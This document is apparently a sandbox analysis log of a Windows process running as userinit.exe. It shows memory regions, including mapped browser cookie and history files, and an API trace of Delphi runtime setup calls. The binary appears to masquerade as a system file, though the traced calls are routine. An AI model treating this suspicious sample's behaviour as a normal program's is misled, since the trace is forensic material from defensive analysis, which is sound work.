end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5737
start_va = 0x13e0000
end_va = 0x141ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013e0000"
filename = ""
Region:
id = 5738
start_va = 0x2b70000
end_va = 0x2c6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b70000"
filename = ""
Region:
id = 5739
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 5740
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 5741
start_va = 0x2c70000
end_va = 0x2f3efff
entry_point = 0x2c70000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5742
start_va = 0x4f0000
end_va = 0x4f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004f0000"
filename = ""
Region:
id = 5743
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 5744
start_va = 0x500000
end_va = 0x500fff
entry_point = 0x500000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 5745
start_va = 0x620000
end_va = 0x621fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 5746
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5747
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 5748
start_va = 0x500000
end_va = 0x500fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000500000"
filename = ""
Region:
id = 5749
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 5750
start_va = 0x29f0000
end_va = 0x2a1bfff
entry_point = 0x29f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 5751
start_va = 0x630000
end_va = 0x637fff
entry_point = 0x630000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 5752
start_va = 0x6d0000
end_va = 0x6dffff
entry_point = 0x6d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 5753
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5754
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5755
start_va = 0x2a20000
end_va = 0x2a9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 5756
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 5757
start_va = 0x2aa0000
end_va = 0x2afffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002aa0000"
filename = ""
Region:
id = 5758
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 5759
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 5760
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5761
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5762
start_va = 0x2f40000
end_va = 0x2ffffff
entry_point = 0x2f40000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 288
os_tid = 0x414
[0178.509] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0178.509] GetKeyboardType (nTypeFlag=0) returned 4
[0178.509] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0178.509] GetStartupInfoA (in: lpStartupInfo=0x6fe94 | out: lpStartupInfo=0x6fe94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0178.509] GetVersion () returned 0x1db10106
[0178.509] GetVersion () returned 0x1db10106
[0178.509] GetCurrentThreadId () returned 0x414
[0178.509] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x6f990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0178.509] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6f86b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0178.509] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f980 | out: phkResult=0x6f980*=0x0) returned 0x2
[0178.509] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f980 | out: phkResult=0x6f980*=0x0) returned 0x2
[0178.509] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f980 | out: phkResult=0x6f980*=0x0) returned 0x2
[0178.509] lstrcpynA (in: lpString1=0x6f86b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0178.510] GetThreadLocale () returned 0x409
[0178.510] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x6f97b, cchData=5 | out: lpLCData="ENU") returned 4
[0178.510] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0178.510] lstrcpynA (in: lpString1=0x6f888, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0178.510] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0178.511] lstrcpynA (in: lpString1=0x6f888, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0178.511] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0178.511] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1f3640
[0178.511] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x520000
[0178.511] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1f4640
[0178.511] VirtualAlloc (lpAddress=0x520000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x520000
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0178.511] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x6fab4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x6faa0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0178.512] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x6faa0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0178.512] GetVersionExA (in: lpVersionInformation=0x6fe38*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6fe38*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0178.512] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0178.512] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0178.512] GetThreadLocale () returned 0x409
[0178.512] GetThreadLocale () returned 0x409
[0178.512] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Jan") returned 4
[0178.512] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x6fd10, cchData=256 | out: lpLCData="January") returned 8
[0178.512] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Feb") returned 4
[0178.512] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x6fd10, cchData=256 | out: lpLCData="February") returned 9
[0178.512] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Mar") returned 4
[0178.512] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x6fd10, cchData=256 | out: lpLCData="March") returned 6
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Apr") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x6fd10, cchData=256 | out: lpLCData="April") returned 6
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x6fd10, cchData=256 | out: lpLCData="May") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x6fd10, cchData=256 | out: lpLCData="May") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Jun") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x6fd10, cchData=256 | out: lpLCData="June") returned 5
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Jul") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x6fd10, cchData=256 | out: lpLCData="July") returned 5
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Aug") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x6fd10, cchData=256 | out: lpLCData="August") returned 7
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Sep") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x6fd10, cchData=256 | out: lpLCData="September") returned 10
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Oct") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x6fd10, cchData=256 | out: lpLCData="October") returned 8
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Nov") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x6fd10, cchData=256 | out: lpLCData="November") returned 9
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Dec") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x6fd10, cchData=256 | out: lpLCData="December") returned 9
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Sun") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Sunday") returned 7
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Mon") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Monday") returned 7
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Tue") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Tuesday") returned 8
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Wed") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Wednesday") returned 10
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Thu") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Thursday") returned 9
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Fri") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Friday") returned 7
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Sat") returned 4
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x6fd10, cchData=256 | out: lpLCData="Saturday") returned 9
[0178.513] GetThreadLocale () returned 0x409
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="$") returned 2
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="0") returned 2
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="0") returned 2
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x6fe64, cchData=2 | out: lpLCData=",") returned 2
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x6fe64, cchData=2 | out: lpLCData=".") returned 2
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="2") returned 2
[0178.513] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x6fe64, cchData=2 | out: lpLCData="/") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0178.514] GetThreadLocale () returned 0x409
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6fd38, cchData=256 | out: lpLCData="1") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0178.514] GetThreadLocale () returned 0x409
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6fd38, cchData=256 | out: lpLCData="1") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x6fe64, cchData=2 | out: lpLCData=":") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="AM") returned 3
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="PM") returned 3
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="0") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="0") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x6fd6c, cchData=256 | out: lpLCData="0") returned 2
[0178.514] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x6fe64, cchData=2 | out: lpLCData=",") returned 2
[0178.514] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0178.514] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0178.515] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0178.515] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0178.515] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0178.515] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0178.516] GetDC (hWnd=0x0) returned 0x23010850
[0178.516] GetDeviceCaps (hdc=0x23010850, index=90) returned 96
[0178.516] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0178.516] GetDC (hWnd=0x0) returned 0x23010850
[0178.516] GetDeviceCaps (hdc=0x23010850, index=104) returned 0
[0178.516] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0178.516] CreatePalette (plpal=0x6fac8) returned 0x48080821
[0178.516] GetStockObject (i=7) returned 0x1b00017
[0178.516] GetStockObject (i=5) returned 0x1900015
[0178.516] GetStockObject (i=13) returned 0x18a002e
[0178.516] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0178.516] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0178.516] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0178.516] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0178.517] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x6fac4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
